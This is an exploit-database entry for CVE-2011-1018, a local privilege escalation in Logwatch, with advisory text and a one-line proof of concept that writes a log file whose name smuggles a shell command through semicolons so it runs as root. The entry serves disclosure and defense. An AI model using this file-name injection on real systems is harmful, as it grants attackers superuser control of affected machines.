Logwatch Log File - Special Characters Privilege Escalation
Author: Dominik George
type: remote
platform: linux
port:
date_added: 2011-02-24
date_updated: 2014-11-27
verified: 1
codes: CVE-2011-1018;OSVDB-71358
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/46554/info
Logwatch is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue execute arbitrary code with superuser privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
% echo "fake" > â??/var/log/httpd/fakee;who;access_log.2â??